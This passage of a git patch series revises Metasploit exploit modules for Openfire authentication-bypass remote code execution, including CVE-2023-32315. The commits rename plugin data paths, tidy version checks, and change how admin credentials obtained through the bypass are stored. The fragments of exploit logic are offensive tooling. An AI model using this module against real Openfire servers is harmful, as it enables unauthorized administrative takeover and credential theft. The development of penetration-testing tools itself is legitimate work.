external/source/exploits/{CVE-2008-6508 => openfire_plugin}/Example.java (100%) diff --git a/data/exploits/CVE-2023-32315/changelog.html b/data/exploits/openfire_plugin/changelog.html similarity index 100% rename from data/exploits/CVE-2023-32315/changelog.html rename to data/exploits/openfire_plugin/changelog.html diff --git a/data/exploits/CVE-2023-32315/lib/plugin-metasploit.jar b/data/exploits/openfire_plugin/lib/plugin-metasploit.jar similarity index 100% rename from data/exploits/CVE-2023-32315/lib/plugin-metasploit.jar rename to data/exploits/openfire_plugin/lib/plugin-metasploit.jar diff --git a/data/exploits/CVE-2023-32315/logo_large.gif b/data/exploits/openfire_plugin/logo_large.gif similarity index 100% rename from data/exploits/CVE-2023-32315/logo_large.gif rename to data/exploits/openfire_plugin/logo_large.gif diff --git a/data/exploits/CVE-2023-32315/logo_small.gif b/data/exploits/openfire_plugin/logo_small.gif similarity index 100% rename from data/exploits/CVE-2023-32315/logo_small.gif rename to data/exploits/openfire_plugin/logo_small.gif diff --git a/data/exploits/CVE-2023-32315/plugin.xml b/data/exploits/openfire_plugin/plugin.xml similarity index 100% rename from data/exploits/CVE-2023-32315/plugin.xml rename to data/exploits/openfire_plugin/plugin.xml diff --git a/data/exploits/CVE-2023-32315/readme.html b/data/exploits/openfire_plugin/readme.html similarity index 100% rename from data/exploits/CVE-2023-32315/readme.html rename to data/exploits/openfire_plugin/readme.html diff --git a/external/source/exploits/CVE-2008-6508/Example.java b/external/source/exploits/openfire_plugin/Example.java similarity index 100% rename from external/source/exploits/CVE-2008-6508/Example.java rename to external/source/exploits/openfire_plugin/Example.java diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index 79e1bc0418..25bd69751a 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -141,12 +141,12 @@ class MetasploitModule < Msf::Exploit::Remote ] jar = Rex::Zip::Jar.new - jar.add_files(files, File.join(Msf::Config.data_directory, "exploits", "CVE-2008-6508")) + jar.add_files(files, File.join(Msf::Config.data_directory, "exploits", "openfire_plugin")) plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(8+rand(8)) plugin_desc = datastore['PLUGINDESC'] || rand_text_alphanumeric(8+rand(8)) - plugin_xml = File.open(File.join(Msf::Config.data_directory, "exploits", "CVE-2008-6508", "plugin.xml"), "rb") {|fd| fd.read() } + plugin_xml = File.open(File.join(Msf::Config.data_directory, "exploits", "openfire_plugin", "plugin.xml"), "rb") {|fd| fd.read() } plugin_xml.gsub!(/PLUGINNAME/, plugin_name) plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc) plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author) diff --git a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb index d0e72f336e..1753193e53 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb @@ -179,13 +179,13 @@ class MetasploitModule < Msf::Exploit::Remote ] jar = Rex::Zip::Jar.new - jar.add_files(files, File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315')) + jar.add_files(files, File.join(Msf::Config.data_directory, 'exploits', 'openfire_plugin')) @plugin_name = datastore['PLUGINNAME'] || Rex::Text.rand_text_alphanumeric(8..15) plugin_author = datastore['PLUGINAUTHOR'] || Rex::Text.rand_text_alphanumeric(8..15) plugin_desc = datastore['PLUGINDESC'] || Rex::Text.rand_text_alphanumeric(8..15) - plugin_xml = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315', 'plugin.xml')) + plugin_xml = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'openfire_plugin', 'plugin.xml')) plugin_xml.gsub!(/PLUGINNAME/, @plugin_name) plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc) plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author) From f608424242c040891811197ffc318db4715125df Mon Sep 17 00:00:00 2001 From: "H00die.Gr3y" <38109035+h00die-gr3y@users.noreply.github.com> Date: Sat, 15 Jul 2023 12:02:22 +0200 Subject: [PATCH 5/7] Apply suggestions from code review Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com> Co-authored-by: Brendan --- .../http/openfire_auth_bypass_rce_cve_2023_32315.rb | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb index 1753193e53..e3880aee8d 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb @@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote def get_version # get Openfire version number from the admin console login page - openfire = {} + openfire = nil res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login.jsp'), @@ -87,9 +87,10 @@ class MetasploitModule < Msf::Exploit::Remote }) if res && res.code == 200 version = res.body.match(/Openfire,\s*\D*:\s*\d\.\d{1,2}\.\d/) - openfire['version'] = version[0].split(':')[1].strip unless version.nil? + openfire = Rex::Version.new(version[0].split(':')[1].strip) unless version.nil? end - return openfire + + openfire end def auth_bypass @@ -237,7 +238,7 @@ class MetasploitModule < Msf::Exploit::Remote return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.8.0') if Rex::Version.new(openfire['version']) < Rex::Version.new('4.8.0') && Rex::Version.new(openfire['version']) >= Rex::Version.new('3.10.0') - CheckCode::Vulnerable("Openfire version is #{openfire['version']}") + CheckCode::Appears("Openfire version is #{openfire['version']}") else CheckCode::Safe("Openfire version is #{openfire['version']}") end From 0ff2ca4f40b42509dfa2a0c28136f88a83b9ce97 Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Sun, 16 Jul 2023 18:43:21 +0000 Subject: [PATCH 6/7] updates based on latest comments --- ...openfire_auth_bypass_rce_cve_2023_32315.rb | 43 +++++++++++++------ 1 file changed, 31 insertions(+), 12 deletions(-) diff --git a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb index e3880aee8d..31339d7e0a 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb @@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote def get_version # get Openfire version number from the admin console login page - openfire = nil + openfire_version = nil res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login.jsp'), @@ -87,10 +87,10 @@ class MetasploitModule < Msf::Exploit::Remote }) if res && res.code == 200 version = res.body.match(/Openfire,\s*\D*:\s*\d\.\d{1,2}\.\d/) - openfire = Rex::Version.new(version[0].split(':')[1].strip) unless version.nil? + openfire_version = Rex::Version.new(version[0].split(':')[1].strip) unless version.nil? end - - openfire + + openfire_version end def auth_bypass @@ -142,6 +142,23 @@ class MetasploitModule < Msf::Exploit::Remote return @admin_login end + def report_valid_login_creds(user, pwd) + credential_data = { + module_fullname: fullname, + username: user, + private_data: pwd, + private_type: :password, + workspace_id: myworkspace_id, + proof: cookie_jar.cookies, + status: Metasploit::Model::Login::Status::SUCCESSFUL + }.merge(service_details) + + cred_res = create_credential_and_login(credential_data) + unless cred_res.nil? + print_status("Credentials for user:#{user} are added to the database...") + end + end + def login_admin_user # login using admin hash with admin username and password # returns true if login successful else returns false @@ -163,6 +180,8 @@ class MetasploitModule < Msf::Exploit::Remote } }) if res && res.code == 200 && res.body.match(/login box/).nil? + # store_valid_credential‎(user: @admin_login['username'], private: @admin_login['password'], proof: cookie_jar.cookies) + report_valid_login_creds(@admin_login['username'], @admin_login['password']) return true else return false @@ -230,17 +249,17 @@ class MetasploitModule < Msf::Exploit::Remote end def check - openfire = get_version - return CheckCode::Safe if openfire.empty? + openfire_version = get_version + return CheckCode::Safe if openfire_version.nil? # check first for patched versions - return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.6.8') - return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.7.5') - return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.8.0') + return CheckCode::Safe("Openfire version is #{openfire_version}") if openfire_version == Rex::Version.new('4.6.8') + return CheckCode::Safe("Openfire version is #{openfire_version}") if openfire_version == Rex::Version.new('4.7.5') + return CheckCode::Safe("Openfire version is #{openfire_version}") if openfire_version == Rex::Version.new('4.8.0') - if Rex::Version.new(openfire['version']) < Rex::Version.new('4.8.0') && Rex::Version.new(openfire['version']) >= Rex::Version.new('3.10.0') - CheckCode::Appears("Openfire version is #{openfire['version']}") + if openfire_version < Rex::Version.new('4.8.0') && openfire_version >= Rex::Version.new('3.10.0') + CheckCode::Appears("Openfire version is #{openfire_version}") else - CheckCode::Safe("Openfire version is #{openfire['version']}") + CheckCode::Safe("Openfire version is #{openfire_version}") end end From 7f35abff86261ebed76bcf8c1cd4723f4e7766ec Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Tue, 18 Jul 2023 08:38:06 +0000 Subject: [PATCH 7/7] =?UTF-8?q?fixed=20the=20invalid=20character=20at=20th?= =?UTF-8?q?e=20store=5Fvalid=5Fcredential=E2=80=8E=20function?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...openfire_auth_bypass_rce_cve_2023_32315.rb | 20 +------------------ 1 file changed, 1 insertion(+), 19 deletions(-) diff --git a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb index 31339d7e0a..131d479c84 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb @@ -142,23 +142,6 @@ class MetasploitModule < Msf::Exploit::Remote return @admin_login end - def report_valid_login_creds(user, pwd) - credential_data = { - module_fullname: fullname, - username: user, - private_data: pwd, - private_type: :password, - workspace_id: myworkspace_id, - proof: cookie_jar.cookies, - status: Metasploit::Model::Login::Status::SUCCESSFUL - }.merge(service_details) - - cred_res = create_credential_and_login(credential_data) - unless cred_res.nil? - print_status("Credentials for user:#{user} are added to the database...") - end - end - def login_admin_user # login using admin hash with admin username and password # returns true if login successful else returns false @@ -180,8 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote } }) if res && res.code == 200 && res.body.match(/login box/).nil? - # store_valid_credential‎(user: @admin_login['username'], private: @admin_login['password'], proof: cookie_jar.cookies) - report_valid_login_creds(@admin_login['username'], @admin_login['password']) + store_valid_credential(user: @admin_login['username'], private: @admin_login['password'], proof: cookie_jar.cookies) return true else return false